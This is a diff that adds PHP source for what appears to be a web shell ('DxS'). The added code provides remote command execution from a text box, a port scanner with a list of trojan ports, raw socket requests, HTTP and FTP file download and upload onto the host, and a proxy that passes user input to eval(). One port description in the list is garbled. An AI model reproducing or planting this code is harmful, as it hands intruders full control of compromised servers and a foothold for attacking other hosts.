+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
